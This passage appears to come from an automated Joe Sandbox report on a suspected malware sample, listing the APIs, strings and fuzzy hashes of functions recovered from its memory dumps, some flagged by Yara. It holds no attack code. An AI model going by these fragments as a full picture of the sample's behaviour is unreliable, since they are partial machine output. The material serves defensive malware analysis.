                                                      • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 024A905D
                                                      • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 024A9076
                                                      • SetLastError.KERNEL32(00000000,?,024A9038,024A69C9,024C0907,00000008,024C0C6C,?,?,?,?,024A3CB2,?,?,0045A064), ref: 024A90C8
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.3676976121.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_2480000_ief722WreR.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: ErrorLastValue___vcrt_
                                                      • String ID:
                                                      • API String ID: 3852720340-0
                                                      • Opcode ID: e85c682642ed7c149dd5185dec7a9b8ad0a0b140fbe983a0f7f6208f4934dca6
                                                      • Instruction ID: 2d13900fcbd54f275cd37ca487f3f67ec03d4353d4293964fe3dad73cb3071a9
                                                      • Opcode Fuzzy Hash: e85c682642ed7c149dd5185dec7a9b8ad0a0b140fbe983a0f7f6208f4934dca6
                                                      • Instruction Fuzzy Hash: 3A01FC3320D7216EA72427B57CA99672755EB357B5B30033FF520493E1EF1288658D85
                                                      APIs
                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 00404D63
                                                      • int.LIBCPMT ref: 00404D7A
                                                        • Part of subcall function 0040BD5C: std::_Lockit::_Lockit.LIBCPMT ref: 0040BD6D
                                                        • Part of subcall function 0040BD5C: std::_Lockit::~_Lockit.LIBCPMT ref: 0040BD87
                                                      • std::locale::_Getfacet.LIBCPMT ref: 00404D83
                                                      • std::_Facet_Register.LIBCPMT ref: 00404DB4
                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 00404DCA
                                                      • __CxxThrowException@8.LIBVCRUNTIME ref: 00404DE8
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.3674170540.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_ief722WreR.jbxd
                                                      Similarity
                                                      • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_GetfacetRegisterThrowstd::locale::_
                                                      • String ID:
                                                      • API String ID: 2243866535-0
                                                      • Opcode ID: 845bdeb7715bd98cda63df9c5850d512ab2bcf4152fe4b0e9e0a5932c046342a
                                                      • Instruction ID: 50d9ff0d4b57cf36d5715a51c78873cd43da78958b4b2dc720108d245924cf68
                                                      • Opcode Fuzzy Hash: 845bdeb7715bd98cda63df9c5850d512ab2bcf4152fe4b0e9e0a5932c046342a
                                                      • Instruction Fuzzy Hash: EB11A0B2D101299BCB15EBA4C841AAE77B0AF44318F14457FE911BB2D2DB3C9A058BDD
                                                      APIs
                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 02484FCA
                                                      • int.LIBCPMT ref: 02484FE1
                                                        • Part of subcall function 0248BFC3: std::_Lockit::_Lockit.LIBCPMT ref: 0248BFD4
                                                        • Part of subcall function 0248BFC3: std::_Lockit::~_Lockit.LIBCPMT ref: 0248BFEE
                                                      • std::locale::_Getfacet.LIBCPMT ref: 02484FEA
                                                      • std::_Facet_Register.LIBCPMT ref: 0248501B
                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 02485031
                                                      • __CxxThrowException@8.LIBVCRUNTIME ref: 0248504F
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.3676976121.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_2480000_ief722WreR.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_GetfacetRegisterThrowstd::locale::_
                                                      • String ID:
                                                      • API String ID: 2243866535-0
                                                      • Opcode ID: 845bdeb7715bd98cda63df9c5850d512ab2bcf4152fe4b0e9e0a5932c046342a
                                                      • Instruction ID: 5c43502c7d1c2b6603fea09ba7882039da7b2105ff86d9db859e625ce53303c6
                                                      • Opcode Fuzzy Hash: 845bdeb7715bd98cda63df9c5850d512ab2bcf4152fe4b0e9e0a5932c046342a
                                                      • Instruction Fuzzy Hash: E311C2319202289BCB25FB65D800AEE77B2BF05314F55051FE816AB2D0DF749A06CFD0
                                                      APIs
                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 0040C19A
                                                      • int.LIBCPMT ref: 0040C1B1
                                                        • Part of subcall function 0040BD5C: std::_Lockit::_Lockit.LIBCPMT ref: 0040BD6D
                                                        • Part of subcall function 0040BD5C: std::_Lockit::~_Lockit.LIBCPMT ref: 0040BD87
                                                      • std::locale::_Getfacet.LIBCPMT ref: 0040C1BA
                                                      • std::_Facet_Register.LIBCPMT ref: 0040C1EB
                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 0040C201
                                                      • __CxxThrowException@8.LIBVCRUNTIME ref: 0040C21F
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.3674170540.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_ief722WreR.jbxd
                                                      Similarity
                                                      • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_GetfacetRegisterThrowstd::locale::_
                                                      • String ID:
                                                      • API String ID: 2243866535-0
                                                      • Opcode ID: 85abdb0988c3cddd0f6a8b60fdbc61777acb1b1010c60c0f2330721e54f81ae2
                                                      • Instruction ID: ee53003dfc9470fa79d8cc5ab50186f75a1860792542933f5f9c6443a3e70220
                                                      • Opcode Fuzzy Hash: 85abdb0988c3cddd0f6a8b60fdbc61777acb1b1010c60c0f2330721e54f81ae2
                                                      • Instruction Fuzzy Hash: B2119172900219EBCB15EB90C881AAD7760AF44314F14053FE811BB2D2DB389A059B99
                                                      APIs
                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 004054E3
                                                      • int.LIBCPMT ref: 004054FA
                                                        • Part of subcall function 0040BD5C: std::_Lockit::_Lockit.LIBCPMT ref: 0040BD6D
                                                        • Part of subcall function 0040BD5C: std::_Lockit::~_Lockit.LIBCPMT ref: 0040BD87
                                                      • std::locale::_Getfacet.LIBCPMT ref: 00405503
                                                      • std::_Facet_Register.LIBCPMT ref: 00405534
                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 0040554A
                                                      • __CxxThrowException@8.LIBVCRUNTIME ref: 00405568
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.3674170540.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_ief722WreR.jbxd
                                                      Similarity
                                                      • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_GetfacetRegisterThrowstd::locale::_
                                                      • String ID:
                                                      • API String ID: 2243866535-0
                                                      • Opcode ID: 10913962cff3651302842d72b7cb42c766a1b7b0878e2d3a054d6c0589329772
                                                      • Instruction ID: 21a092b80c120d3a1799ad65edf81cfe58c90a4d0a542ae4cd53e0a409a0227e
                                                      • Opcode Fuzzy Hash: 10913962cff3651302842d72b7cb42c766a1b7b0878e2d3a054d6c0589329772
                                                      • Instruction Fuzzy Hash: A711AC72D10628ABCB15EBA4C801AAE7774EF44318F14053EE811BB2D2DB389A058F9C
                                                      APIs
                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 0040557F
                                                      • int.LIBCPMT ref: 00405596
                                                        • Part of subcall function 0040BD5C: std::_Lockit::_Lockit.LIBCPMT ref: 0040BD6D
                                                        • Part of subcall function 0040BD5C: std::_Lockit::~_Lockit.LIBCPMT ref: 0040BD87
                                                      • std::locale::_Getfacet.LIBCPMT ref: 0040559F
                                                      • std::_Facet_Register.LIBCPMT ref: 004055D0
                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 004055E6
                                                      • __CxxThrowException@8.LIBVCRUNTIME ref: 00405604
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.3674170540.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_ief722WreR.jbxd
                                                      Similarity
                                                      • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_GetfacetRegisterThrowstd::locale::_
                                                      • String ID:
                                                      • API String ID: 2243866535-0
                                                      • Opcode ID: f8330ae3b68186870bdfbd2c21a05cb33b5aede15e19bdae88c6f234de43f936
                                                      • Instruction ID: 21547056dedd0a357f918a94d9d64b27cd1eadba8e4608574907870a271d474c
                                                      • Opcode Fuzzy Hash: f8330ae3b68186870bdfbd2c21a05cb33b5aede15e19bdae88c6f234de43f936
                                                      • Instruction Fuzzy Hash: 3D119E72900628EBCB15EBA5C841AEEB370EF04314F14453FE811BB2D2DB789A058B9C
                                                      APIs
                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 00404C25
                                                      • int.LIBCPMT ref: 00404C3C
                                                        • Part of subcall function 0040BD5C: std::_Lockit::_Lockit.LIBCPMT ref: 0040BD6D
                                                        • Part of subcall function 0040BD5C: std::_Lockit::~_Lockit.LIBCPMT ref: 0040BD87
                                                      • std::locale::_Getfacet.LIBCPMT ref: 00404C45
                                                      • std::_Facet_Register.LIBCPMT ref: 00404C76
                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 00404C8C
                                                      • __CxxThrowException@8.LIBVCRUNTIME ref: 00404CAA
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.3674170540.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_ief722WreR.jbxd
                                                      Similarity
                                                      • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_GetfacetRegisterThrowstd::locale::_
                                                      • String ID:
                                                      • API String ID: 2243866535-0
                                                      • Opcode ID: 8360cf2ad30bdfb21b7e95981d287bcfb384644201decadf3b6eee33653b9c52
                                                      • Instruction ID: 1aa241efc112286da59c73bb00310cdec327cb4216d8ea75c5d160ea2c1741d7
                                                      • Opcode Fuzzy Hash: 8360cf2ad30bdfb21b7e95981d287bcfb384644201decadf3b6eee33653b9c52
                                                      • Instruction Fuzzy Hash: 5311E0B2C002289BCB11EBA0C801AEE7774AF44318F10053FE911BB2D1CB389E058B98
                                                      APIs
                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 0248C401
                                                      • int.LIBCPMT ref: 0248C418
                                                        • Part of subcall function 0248BFC3: std::_Lockit::_Lockit.LIBCPMT ref: 0248BFD4
                                                        • Part of subcall function 0248BFC3: std::_Lockit::~_Lockit.LIBCPMT ref: 0248BFEE
                                                      • std::locale::_Getfacet.LIBCPMT ref: 0248C421
                                                      • std::_Facet_Register.LIBCPMT ref: 0248C452
                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 0248C468
                                                      • __CxxThrowException@8.LIBVCRUNTIME ref: 0248C486
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.3676976121.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_2480000_ief722WreR.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_GetfacetRegisterThrowstd::locale::_
                                                      • String ID:
                                                      • API String ID: 2243866535-0
                                                      • Opcode ID: 85abdb0988c3cddd0f6a8b60fdbc61777acb1b1010c60c0f2330721e54f81ae2
                                                      • Instruction ID: 080d1e1ab3d2e7bfcfc859a30103bf800f74dfddc59c058dfe66ee1bff4fa622
                                                      • Opcode Fuzzy Hash: 85abdb0988c3cddd0f6a8b60fdbc61777acb1b1010c60c0f2330721e54f81ae2
                                                      • Instruction Fuzzy Hash: 4411E5719102289BCF19FB65C844AFD7776AF40714F10051FE811BB290DF748A41CFA0
                                                      APIs
                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 02484E8C
                                                      • int.LIBCPMT ref: 02484EA3
                                                        • Part of subcall function 0248BFC3: std::_Lockit::_Lockit.LIBCPMT ref: 0248BFD4
                                                        • Part of subcall function 0248BFC3: std::_Lockit::~_Lockit.LIBCPMT ref: 0248BFEE
                                                      • std::locale::_Getfacet.LIBCPMT ref: 02484EAC
                                                      • std::_Facet_Register.LIBCPMT ref: 02484EDD
                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 02484EF3
                                                      • __CxxThrowException@8.LIBVCRUNTIME ref: 02484F11
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.3676976121.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_2480000_ief722WreR.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_GetfacetRegisterThrowstd::locale::_
                                                      • String ID:
                                                      • API String ID: 2243866535-0
                                                      • Opcode ID: 8360cf2ad30bdfb21b7e95981d287bcfb384644201decadf3b6eee33653b9c52
                                                      • Instruction ID: c9fed2677125e939422074f424157d3a327a9436136dc500938c97e5e74ffdec
                                                      • Opcode Fuzzy Hash: 8360cf2ad30bdfb21b7e95981d287bcfb384644201decadf3b6eee33653b9c52
                                                      • Instruction Fuzzy Hash: CA11CE329102299BCF15FBA5D800AEE77B2AF44314F14051FE911B7290EF749A01CF90
                                                      APIs
                                                      • __EH_prolog3_GS.LIBCMT ref: 00404E6A
                                                        • Part of subcall function 0040BB47: __EH_prolog3_GS.LIBCMT ref: 0040BB4E
                                                      • std::_Locinfo::_Locinfo.LIBCPMT ref: 00404EB5
                                                      • __Getcoll.LIBCPMT ref: 00404EC4
                                                      • std::_Locinfo::~_Locinfo.LIBCPMT ref: 00404ED4
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.3674170540.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_ief722WreR.jbxd
                                                      Similarity
                                                      • API ID: H_prolog3_Locinfostd::_$GetcollLocinfo::_Locinfo::~_
                                                      • String ID: fJ@
                                                      • API String ID: 1836011271-3478227103
                                                      • Opcode ID: c526677c734dc493626db39d482cf98f5f5362d0ee08f882613185e0243459e5
                                                      • Instruction ID: b09a35a98a06b47a9133a0f6fd6c3c5fe655fd81b24a3011873ef7005f6a19eb
                                                      • Opcode Fuzzy Hash: c526677c734dc493626db39d482cf98f5f5362d0ee08f882613185e0243459e5
                                                      • Instruction Fuzzy Hash: 160157719002089FDB00EFA5C481B9EB7B0BF80318F10857EE045AB6C1CB789A84CB99
                                                      APIs
                                                      • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,0042FE95,00000003,?,0042FE35,00000003,00457970,0000000C,0042FF8C,00000003,00000002), ref: 0042FF04
                                                      • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 0042FF17
                                                      • FreeLibrary.KERNEL32(00000000,?,?,?,0042FE95,00000003,?,0042FE35,00000003,00457970,0000000C,0042FF8C,00000003,00000002,00000000), ref: 0042FF3A
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.3674170540.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_ief722WreR.jbxd
                                                      Similarity
                                                      • API ID: AddressFreeHandleLibraryModuleProc
                                                      • String ID: CorExitProcess$mscoree.dll
                                                      • API String ID: 4061214504-1276376045
                                                      • Opcode ID: a7c01f4cf2846fc1278f2b92eb4297b36712501a434ecdb6ef0bfa768b076a5b
                                                      • Instruction ID: 2c645cf7ccd09daad3cc37133732e5cb7e12e7ad02a2fd82027b287817b89b2c
                                                      • Opcode Fuzzy Hash: a7c01f4cf2846fc1278f2b92eb4297b36712501a434ecdb6ef0bfa768b076a5b
                                                      • Instruction Fuzzy Hash: 00F0C830A10218BBDB109F90DD09B9EFFB4EF05B12F5100B6F805A2290CB799E44CB9C
                                                      APIs
                                                      • Concurrency::details::SchedulerProxy::GetCurrentThreadExecutionResource.LIBCMT ref: 0041CE21
                                                      • Concurrency::details::ResourceManager::RemoveExecutionResource.LIBCONCRT ref: 0041CE45
                                                      • std::invalid_argument::invalid_argument.LIBCONCRT ref: 0041CE58
                                                      • __CxxThrowException@8.LIBVCRUNTIME ref: 0041CE66
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.3674170540.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_ief722WreR.jbxd
                                                      Similarity
                                                      • API ID: Resource$Concurrency::details::Execution$CurrentException@8Manager::Proxy::RemoveSchedulerThreadThrowstd::invalid_argument::invalid_argument
                                                      • String ID: pScheduler
                                                      • API String ID: 3657713681-923244539
                                                      • Opcode ID: b7c09c7fa46f95498cdc0359c1e5e1487ada7160e74a5b8724d38a9ce94e1cb3
                                                      • Instruction ID: 55b545704ffbdb88c77e4cd2f194ab5b8344582a808f7ff6d102e262485e3fbf
                                                      • Opcode Fuzzy Hash: b7c09c7fa46f95498cdc0359c1e5e1487ada7160e74a5b8724d38a9ce94e1cb3
                                                      • Instruction Fuzzy Hash: 7FF05935940714A7C714EA05DC82CDEB3799E90B18760822FE40963282DF3CA98AC29D
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.3676976121.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_2480000_ief722WreR.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: H_prolog3_catchmake_shared
                                                      • String ID: MOC$RCC$v)D
                                                      • API String ID: 3472968176-3108830043
                                                      • Opcode ID: 97e7bd69da2a212c52dfa9d68122ee8a36af56c02b3e00c92559e584b2ae2017
                                                      • Instruction ID: d89199b3ae4fef76cffa81a27c3a1dc02c5c22ed7ca3ae60add89021205471e6
                                                      • Opcode Fuzzy Hash: 97e7bd69da2a212c52dfa9d68122ee8a36af56c02b3e00c92559e584b2ae2017
                                                      • Instruction Fuzzy Hash: 1AF04FB5A00614DFDF5AFF69C41076D3B69BF22B04F5A909BF4405B2A0CB785988CFA1
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.3674170540.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_ief722WreR.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 6c38956e1fcac5f369ef9c80324371170828598558401bce77602d6080795c3e
                                                      • Instruction ID: bf4f81b698e6ff7fb3fc7778d7bd366b6aaf8ee244f588ee8458200c33ffab4c
                                                      • Opcode Fuzzy Hash: 6c38956e1fcac5f369ef9c80324371170828598558401bce77602d6080795c3e
                                                      • Instruction Fuzzy Hash: E7719D31A00366DBCB21CF95E884ABFBB75FF45360F98426AE81097290D7789D41C7E9
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.3676976121.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_2480000_ief722WreR.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: c6c6193084eda7c089116deee67986cf6f8c182de1deee36b40da2a445f3b6d2
                                                      • Instruction ID: b27f609adf0015fc56f8b9ea66ec14800685be707f0b7ec8525cc07e8f04d9f6
                                                      • Opcode Fuzzy Hash: c6c6193084eda7c089116deee67986cf6f8c182de1deee36b40da2a445f3b6d2
                                                      • Instruction Fuzzy Hash: FC71D271900216DBDB21CF99C8A4ABFBBB5FF7532CF54422BE41157280DB718982CBA0
                                                      APIs
                                                        • Part of subcall function 004336A7: RtlAllocateHeap.NTDLL(00000000,0040D870,00000000,?,0042679E,00000002,00000000,00000000,00000000,?,0040CD21,0040D870,00000004,00000000,00000000,00000000), ref: 004336D9
                                                      • _free.LIBCMT ref: 00430B4F
                                                      • _free.LIBCMT ref: 00430B66
                                                      • _free.LIBCMT ref: 00430B85
                                                      • _free.LIBCMT ref: 00430BA0
                                                      • _free.LIBCMT ref: 00430BB7
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.3674170540.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_ief722WreR.jbxd
                                                      Similarity
                                                      • API ID: _free$AllocateHeap
                                                      • String ID:
                                                      • API String ID: 3033488037-0
                                                      • Opcode ID: 4b14be92388a641d302b0d73df062879f9d592ea064aecebb9857b6d72074d0e
                                                      • Instruction ID: f55d0931b52299485a7a2c2bc17b7062c97d80267fd2ec389340ea5f3bc65001
                                                      • Opcode Fuzzy Hash: 4b14be92388a641d302b0d73df062879f9d592ea064aecebb9857b6d72074d0e
                                                      • Instruction Fuzzy Hash: 1B51E171A00304AFEB21AF69D851B6BB7F5EF5C724F14166EE809D7250E739E9018B88
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.3676976121.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_2480000_ief722WreR.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: _free$AllocateHeap
                                                      • String ID:
                                                      • API String ID: 3033488037-0
                                                      • Opcode ID: e6a1cd199720be507b115cfcd6438e99282708a3fba9711a6543aa0e9cd6d86a
                                                      • Instruction ID: 3d5ce12d85e78b1ec7b6ee11579a03264736c9aab66c48f996b3922d2aa94c6f
                                                      • Opcode Fuzzy Hash: e6a1cd199720be507b115cfcd6438e99282708a3fba9711a6543aa0e9cd6d86a
                                                      • Instruction Fuzzy Hash: 51519331A003049FDB229F2AD841BAB77F9EF48725F14556EE809D7290E731E901CBA0
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.3674170540.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_ief722WreR.jbxd
                                                      Similarity
                                                      • API ID: _free
                                                      • String ID:
                                                      • API String ID: 269201875-0
                                                      • Opcode ID: 1c99ce021355179fcddcfd06fb8a158a48e66a022eb351b43cbd83f2af86aab5
                                                      • Instruction ID: a8a3d8b7f400355b52e94c2f1cdfa5b65e8520eb193c97cf831389b305dd6f12
                                                      • Opcode Fuzzy Hash: 1c99ce021355179fcddcfd06fb8a158a48e66a022eb351b43cbd83f2af86aab5
                                                      • Instruction Fuzzy Hash: C641C332A00204AFCB10DF79C981A5EB7F5EF89718F25456AE616EB391DB35ED01CB84
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.3676976121.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_2480000_ief722WreR.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: _free
                                                      • String ID:
                                                      • API String ID: 269201875-0
                                                      • Opcode ID: 1c99ce021355179fcddcfd06fb8a158a48e66a022eb351b43cbd83f2af86aab5
                                                      • Instruction ID: 24c77b10373240b01ca32d40b18eb60aebc2178b60da524a0c763016ee606016
                                                      • Opcode Fuzzy Hash: 1c99ce021355179fcddcfd06fb8a158a48e66a022eb351b43cbd83f2af86aab5
                                                      • Instruction Fuzzy Hash: 8241DE36A002049FCB21DF79C890A9EB7E6EF88714B1545AAE909EB381D731E901CB90
                                                      APIs
                                                      • MultiByteToWideChar.KERNEL32(?,00000000,23E85006,0042D0FA,00000000,00000000,0042D938,?,0042D938,?,00000001,0042D0FA,23E85006,00000001,0042D938,0042D938), ref: 004368EA
                                                      • __alloca_probe_16.LIBCMT ref: 00436922
                                                      • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00436973
                                                      • GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 00436985
                                                      • __freea.LIBCMT ref: 0043698E
                                                        • Part of subcall function 004336A7: RtlAllocateHeap.NTDLL(00000000,0040D870,00000000,?,0042679E,00000002,00000000,00000000,00000000,?,0040CD21,0040D870,00000004,00000000,00000000,00000000), ref: 004336D9
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.3674170540.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_ief722WreR.jbxd
                                                      Similarity
                                                      • API ID: ByteCharMultiWide$AllocateHeapStringType__alloca_probe_16__freea
                                                      • String ID:
                                                      • API String ID: 313313983-0
                                                      • Opcode ID: 9c34806f26188793042e586e0c43cfd4b91246b94106e2b49bc92d76a4d51be1
                                                      • Instruction ID: 7e388e7d71fb0b77ac45b15fa9433514929e8a136d1dde51ddb927b45f4c022b
                                                      • Opcode Fuzzy Hash: 9c34806f26188793042e586e0c43cfd4b91246b94106e2b49bc92d76a4d51be1
                                                      • Instruction Fuzzy Hash: AF310372A1020AABDF259F65CC41EAF7BA5EF48710F15422AFC04D7250E739CD54CB94
                                                      APIs
                                                      • _SpinWait.LIBCONCRT ref: 0041AEEB
                                                        • Part of subcall function 00410F21: _SpinWait.LIBCONCRT ref: 00410F39
                                                      • Concurrency::details::ContextBase::ClearAliasTable.LIBCONCRT ref: 0041AEFF
                                                      • Concurrency::details::_ReaderWriterLock::_AcquireWrite.LIBCONCRT ref: 0041AF31
                                                      • List.LIBCMT ref: 0041AFB4
                                                      • List.LIBCMT ref: 0041AFC3
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.3674170540.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_ief722WreR.jbxd
                                                      Similarity
                                                      • API ID: ListSpinWait$AcquireAliasBase::ClearConcurrency::details::Concurrency::details::_ContextLock::_ReaderTableWriteWriter
                                                      • String ID:
                                                      • API String ID: 3281396844-0
                                                      • Opcode ID: 56ae1a35d5e220295b2f308ff1a5f56c228e1c53cf17de30109191e3b59696cb
                                                      • Instruction ID: 46db479fd15f51553f338c6c2feaa856f28efda07e700d063999dccf6460c254
                                                      • Opcode Fuzzy Hash: 56ae1a35d5e220295b2f308ff1a5f56c228e1c53cf17de30109191e3b59696cb
                                                      • Instruction Fuzzy Hash: 32316A71902755DFCB14EFA5D5415EEB7B1BF04308F04406FE40167242DB7869A6CB9A
                                                      APIs
                                                      • _SpinWait.LIBCONCRT ref: 0249B152
                                                        • Part of subcall function 02491188: _SpinWait.LIBCONCRT ref: 024911A0
                                                      • Concurrency::details::ContextBase::ClearAliasTable.LIBCONCRT ref: 0249B166
                                                      • Concurrency::details::_ReaderWriterLock::_AcquireWrite.LIBCONCRT ref: 0249B198
                                                      • List.LIBCMT ref: 0249B21B
                                                      • List.LIBCMT ref: 0249B22A
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.3676976121.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_2480000_ief722WreR.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: ListSpinWait$AcquireAliasBase::ClearConcurrency::details::Concurrency::details::_ContextLock::_ReaderTableWriteWriter
                                                      • String ID:
                                                      • API String ID: 3281396844-0
                                                      • Opcode ID: f93c24b8a1523b9c675fef23dd34f18a22eb4e590b311a59263b58b7b5af817c
                                                      • Instruction ID: a858becbfef2f2573ea93ae7eeb81ac6a0ebc75d52e539bd824adb0aaf9d6891
                                                      • Opcode Fuzzy Hash: f93c24b8a1523b9c675fef23dd34f18a22eb4e590b311a59263b58b7b5af817c
                                                      • Instruction Fuzzy Hash: 79316432A00616DFCF11EFA5E9816EEBBB2FF04348B04406FC8156B680CB716A44CF90
                                                      APIs
                                                      • GdiplusStartup.GDIPLUS(?,?,00000000), ref: 0040206A
                                                      • GdipAlloc.GDIPLUS(00000010), ref: 00402072
                                                      • GdipCreateBitmapFromHBITMAP.GDIPLUS(?,00000000,?), ref: 0040208D
                                                      • GdipSaveImageToFile.GDIPLUS(?,?,?,00000000), ref: 004020B7
                                                      • GdiplusShutdown.GDIPLUS(?), ref: 004020E3
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.3674170540.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_ief722WreR.jbxd
                                                      Similarity
                                                      • API ID: Gdip$Gdiplus$AllocBitmapCreateFileFromImageSaveShutdownStartup
                                                      • String ID:
                                                      • API String ID: 2357751836-0
